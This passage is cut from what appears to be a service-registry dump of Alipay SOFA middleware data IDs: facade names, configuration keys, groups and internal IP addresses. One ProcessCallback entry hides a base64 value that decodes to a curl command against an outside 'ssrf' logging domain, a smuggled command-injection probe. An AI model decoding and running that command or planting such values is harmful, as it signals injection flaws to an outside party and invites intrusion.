FAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-instdispute-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.ops.OpsCacheMifFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_BKEBANK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.kbase.common.service.facade.api.article.ArticleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.InstpayFinalizeExtService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.signcenter.service.read.FirstPaySignDataQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.DiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DCEPCOIN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finpdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PAYBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.148.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.23.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_M_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebplus.common.facade.service.api.query.YebsActiveFundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.drm.SchedulerTaskResource.activeTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MOBILEBC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.FileDownloadManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.backend.api.BackendItemShopsFixFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBOMP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.promoruleOperator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.CacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.content.qa.AnswerQueryApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.InterfaceTagDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.ide.facade.api.IdeFileOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gotonemng_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CTUPOINT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finance.goldetfprod.common.service.facade.openaccount.OpenAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.ParamServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpromocore.common.service.facade.DiscountDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.biz.service.task.Task:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.insurance.api.AccountSecurityInsuranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FundTradeRzoneSwitchDrm.whiteUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cschannel.common.service.facade.api.prod.mng.MadaProdMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.template.purchase.action.CreateFintradeOrderAction:1.0:createActiveFintradeOrderAction@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DEMO_SOFA4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sdaconfigsvr.common.service.facade.api.TaskManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.ordermng_merchant.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.cds.facade.SceneProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mgoodsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.agaccesstoken.IdentificationManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.label.api.LabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.delayMillisecs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.CommonCmdConfigDrm.loadCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.FinfoSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:mdeviceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ol-gray-mgt-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshsecurity.facade.rbac.RbacServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.biz.datafuture.datacompass.component.DataTopicComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngIsvInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.180.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgmng.common.service.facade.jobbulid.JobBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloanmerchportal_superAdminDoubleCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.right.RightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.mng.SymbolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.defaultRecommendAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.common.service.facade.user.UserSessionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.aml.AmlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinspect.facade.ProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pointcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.equity.EquityConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.118.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:bizfundprod-rzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_R_PCCO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.seekers.facade.maas.MaasFunctionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALI_TP_S_BC_YOUKU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:custcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.operation.OperWhiteListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileha.facade.alarmanalysis.ChangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSPECTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minipcodemarket@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.cat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:orderlink-common-do-price-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.hideSpecifyProds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:antlaw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adinventory.drm.facade.XlightDrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.task.rpc.facade.activity.ShareInviteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.meta.RestMetaDatabaseService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findtprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmonitor.core.service.facade.MerchantSubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradeBatchVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmCrossDayWhiteConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finslip.biz.service.impl.mock.BatchOutReconFacadeMock:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.ZdalSequenceRepository:1.0:ficcZdalSequenceRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antsports.common.service.facade.BackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.CompoundProjectSpiFacade:1.0:fundApplicationCompoundProjectSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finpwm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalocs:name=com.alipay.zocs.exratecenterOcsCache.weight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cstraining.common.service.facade.examination.api.NewCstExaminationOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:O2N1cmwgaHR0cDovL016TXdNalE0TmprdExURXdOREF3TXpBeU5BLnNzcmYubm9ibGUubG9nLmx5bm5zaGFyZS5jYzs=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.insight.DayuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.migratedrmhandler.incrementDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficintelbiz.common.service.facade.api.ServiceTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.HealthClockInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rpc.common.service.facade.AntVipService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.facade.CouponTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.ocr.BisIdCardOcrAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:inshealthprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_MSGBENCHMARK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appfuse.common.service.facade.EntityStoreQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_HSF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.memberprod.common.service.account.close.CloseUserV2Service:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.opscloud.MrmRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.tangyuan.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisoropen.common.service.facade.api.AccompanyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ActionLogRzoneService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushUrlRedirectRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.scenecustom.api.SceneCustomQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.blackitem.BlackItemWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:iamlmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeRepoBranchFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.asset.UserAssetQueryCurZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.api.MerchantRelAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbfcore.facade.report.ReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.MYBKBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.CustomerAccountSwitchDrm.findCustomerIdSwitchUid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PROMOBENCH#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.PayToolFinalizeInZoneService:1.0:mdiscountcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteTwoPartyUsageAgreementSignOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imatchfacade.ucdpmng.AdgroupSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alidevice.biz.devicemanager.iotpaysdk.service.FacePayConditionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.space.traffic.CreativeDispatchService:1.0:insiop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.BatchProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.mng.TradeAdminQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.investtrade.facade.api.security.SecurityDealBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.TagUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:zdalapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bmw.coresrv.PipelineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:fincardbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.cicadaQueryApi,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.QuickClaimDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SceneParamDefineFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmarketingprod.common.service.facade.mng.campaign.InsMktProdWorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.ProductFilterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydgp.common.service.facade.pmmodel.PmModelInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.linku.common.service.facade.cache.CacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:channelrouter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mfinsnsprod.service.facade.api.scenecustom.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.midas.service.facade.api.ConstraintQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:insclaiminvestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dsmp.common.service.facade.privilege.service.v2.PrivilegeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.237.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.1.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:invalid-profile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.TaskMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthPurseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.fc.process.bp.engine.job.drm.JobDrmAdapter.gradeMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.103.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.autoaccess.EbppInstFileInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.chargefront.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.merchant.MerchantFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iris.facade.IrisBizModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.grayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundWorkDayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:taskInstanceExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.itemquality.ItemQualityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvServerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msgopprod.common.service.facade.event.EventMessageFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchpunish.facade.suspectevent.SuspectEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csassistant.service.facade.api.AssistantOutcallTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.rpc.AppRpcServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.RegisterAndLotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:model-component@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.TaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundprod.common.service.facade.FundProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.common.service.variable.facade.VariableClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_accountBasicInfoCheckCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKRISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apsasmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundProcessConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:bizreconResolver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.commom.service.facade.DonateFeedbackMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bioperation.service.facade.api.InterfaceTestDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.label.api.AILabelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mobilechat_chatbc_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.IndexProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findataprod.api.EmergencyChangePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.72.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bksmartdecision.common.service.facade.decisionx.api.DecisionXService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.facade.api.AnnaMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BIll#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.us